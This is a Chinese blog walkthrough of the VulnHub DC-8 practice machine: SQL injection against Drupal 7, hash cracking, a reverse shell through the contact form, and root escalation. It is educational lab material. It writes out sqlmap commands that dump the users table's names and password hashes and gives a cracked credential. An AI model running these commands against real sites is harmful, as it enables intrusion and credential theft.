VulnHub——DC-8

最新推荐文章于 2024-03-28 19:46:32 发布
最新推荐文章于 2024-03-28 19:46:32 发布
阅读量222 收藏 1
点赞数
分类专栏: VulnHub 文章标签: 靶机
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_37043565/article/details/112095156
版权

DC-8

靶机链接

难度:难、比较复杂
在这里插入图片描述

目标:获得root权限并读取唯一flag

信息搜集

1、使用Nmap探测靶机并进行详细扫描。
在这里插入图片描述
在这里插入图片描述

80端口:Drupal7
此版本有sql注入漏洞。

漏洞挖掘与利用

使用sqlmap进行注入攻击。

sqlmap -u http://192.168.3.46/?nid=2 --level 5 --dbs
#获取数据库名

sqlmap -u http://192.168.3.46/?nid=2 --level 5 --D d7db --tables
#获取d7db数据库的表名

sqlmap -u http://192.168.3.46/?nid=2 --level 5 -D d7db -T users --columns
#获取列名

sqlmap -u http://192.168.3.46/?nid=2 --level 5 -D d7db -T users -C name,pass --batch --dump

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

将hash写入john.hash,并使用john进行解密。
在这里插入图片描述
在这里插入图片描述

只破解出turtle一条密码。
通过测试得知
john:turtle

漏洞挖掘与利用

利用自带组件写入反弹shell的payload。
在这里插入图片描述

在cotact us界面提交信息后,将会反弹shell。
在这里插入图片描述

提权

发现可利用的命令。
在这里插入图片描述
在这里插入图片描述

搜索相关脚本,发现本地提权脚本。
在这里插入图片描述

使用python搭建简单的http服务,并在靶机shell中下载运行。

kali:
将提权脚本写到本地getshell.sh,保存后在本地开启http服务。
在这里插入图片描述

靶机:
在这里插入图片描述

第一种方式失败。
在这里插入图片描述

第二种方式成功。
在这里插入图片描述

提权脚本

结束。
在这里插入图片描述

Anranaaaa
关注
专栏目录
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
vulnhubdc8
qq_54030686的博客
06-22 458
各位小伙伴,可直接看这位师傅 个人写的很粗糙 DC8本身的难度较低,可以较为轻松地获取到目标权限,总体思路 主机发现,端口扫描,服务探测 一共开启2个端口,80和22端口,80端口开放的服务为drupal 7,打开界面进行检测,这里利用burpsuit联合xray进行检测 burpsuit的user option操作栏中设置自己闲置代理,运行xray即可,如下图所示这里使用bp自带的浏览器进行测试,然后在界面进行点击,每一个功能点都要点击下 点击到 该界面时候,xray检测到存在sql注入,直接上sqlma
Vulnhub靶机:DC-8渗透详细过程
IerkeU的博客
03-28 3062
DC-8 前情提要 靶场地址:https://www.vulnhub.com/entry/dc-8,367/ DC-8是一个中级的靶场,需要具备以下前置知识: 基础的Linux命令及操作 基础的渗透测试工具使用(Kali / Parrot下的工具) 翻译一下官方给出的一些信息: 这个挑战试图证明在 Linux 上安装和配置的双重身份验证是否可以防止 Linux 服务器被攻击。这个挑战的最终目标是绕过双重身份验证,获取根并读取唯一标志。除非您尝试通过SSH登录,否则您可能甚至不知道安装和配置了双重身份验
Vulnhub靶场----8、DC-8
七天
03-03 788
Vulnhub-DC8
DC-8详细渗透过程
MRS_jianai的博客
12-26 451
DC-8靶机详细渗透过程
DC-8靶机渗透
m0_62008601的博客
06-05 1054
dc-8靶机详细渗透过程
DC-8靶场
mlws1900的博客
03-28 655
下载不了可以用迅雷下载。
VulnHub渗透测试靶场- DC-8
11-21
DC-8 是另一个专门建造的易受攻击的实验室,旨在获得渗透测试领域的经验。 这个挑战有点像实际挑战和“概念验证”,即在 Linux 上安装和配置的双因素身份验证是否可以防止 Linux 服务器被利用。 此挑战的“概念...
AD绘图文件——DC-DC降压电路.rar
11-01
本资源"AD绘图文件——DC-DC降压电路.rar"包含了使用Altium Designer绘制的直流降压电路设计,经过验证,该电路能够正常工作。 直流降压电路,也称为开关电源的降压变换器(Buck Converter),是一种常见的电源转换...
vulnhub靶场实战系列-DC-2实战
最新发布
05-18
vulnhub靶场实战系列-DC-2实战
VulnHub 渗透测试靶场 -DC-9
11-21
DC-9 是另一个专门建造的易受攻击的实验室,旨在获得渗透测试领域的经验。 这一挑战的最终目标是扎根并读取唯一的标志。 Linux 技能和熟悉 Linux 命令行是必须的,还有一些基本渗透测试工具的经验。 对于初学者来...
看完这篇 教你玩转渗透测试靶机vulnhub——DC8
Aluxian_的博客
04-07 2326
Vulnhub靶机DC8渗透测试详解Vulnhub靶机介绍:Vulnhub靶机下载:Vulnhub靶机安装:Vulnhub靶机漏洞详解:①:信息收集:②:暴力破解: Vulnhub靶机介绍: vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。 靶机DC8 还是老样子只有拿到root权限才可以发现最终的flag。 Vulnhub靶机下载: 官网地址:https://download.vulnhub.c
DC-8靶场实战
qq_42754807的博客
03-21 795
DC-9靶场实战
vulnhub靶场之DC-8
qq_58091216的博客
01-14 1070
我们查看node,我们可以看到3行蓝色的字,我们一个一个进行访问,最后发现这里就只加了参数nid,非常可疑,可能存在有SQL注入、xss等漏洞。将提交重定向行Confirmation page(确认页面)给勾上,然后滑下点保存,联系随便填入联系表单,点击发送,触发PHP代码。我们可以看到name和pass,我们想到前面的登录页面,我们进行爆破即可。我们可以看到报错了,可能存在报错注入,我们使用sqlmap进行测试。我们看到2个用户名和密码,但是密码是加密的,我们进行解密。
靶机DC-8(详细渗透,适合新手渗透)
热门推荐
君莫hacker的博客
09-05 1万+
目录靶机DC-8 (详细渗透,适合新手渗透)0x01靶机描述0x02环境搭建1. 下载并导入靶机2. 查看网络适配器3. 启动靶机0x03靶机渗透一、 信息收集1. 主机发现2. 端口扫描3. 详细扫描4. 目录扫描5. gobuster目录扫描6. 网站指纹识别二、 漏洞挖掘手工sql注入1. 通过手工验证,此处url含有sql注入漏洞2. 判断字段数3. 判断显示位置4. 查看当前数据库5. 查找库d7db中所有的表6. 查找uesrs表中所有的列7. 查询表中的数据sqlmap自动化执行1. 查当前数
VulnHubDC-8
weixin_39219503的博客
02-02 427
01 环境搭建 靶机环境下载:https://www.vulnhub.com/entry/dc-8,367/ 题目信息如下 DC-8 is another purposely built vulnerable lab with the intent of gaining experience in the world of penetration testing. This challeng...
vulnhub DC8 靶场练习
鸥鹭忘机
09-03 1126
前言 这次练习的靶机vulnhub平台下的DC系列靶机第8台,下载地址为https://www.vulnhub.com/entry/dc-8,367/。挑战该靶机的最终目的是获取root权限,然后读取唯一的flag。这台靶机的总体难度不大,利用的漏洞也是常见的,只要细心观察就可以发现这个突破口。 虚拟机配置 这次采用的网络连接模式依然是NAT模式,为了避免扫描到其他物理主机。在导入虚拟机后,右击DC-6靶机,然后选中配置。依次点击网络配置->NAT模式->高级->生成,然后确认即可。
靶机9 DC-8(过程超详细)
honest_gg的博客
09-26 2334
DC靶场一共有9个,对于学习渗透测试人员,有很大的帮助,是非常不错的靶场。
DC-8靶场下载及渗透实战详细过程(DC靶场系列)
金 帛的博客
08-08 3836
dc-8靶场详细渗透过程
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值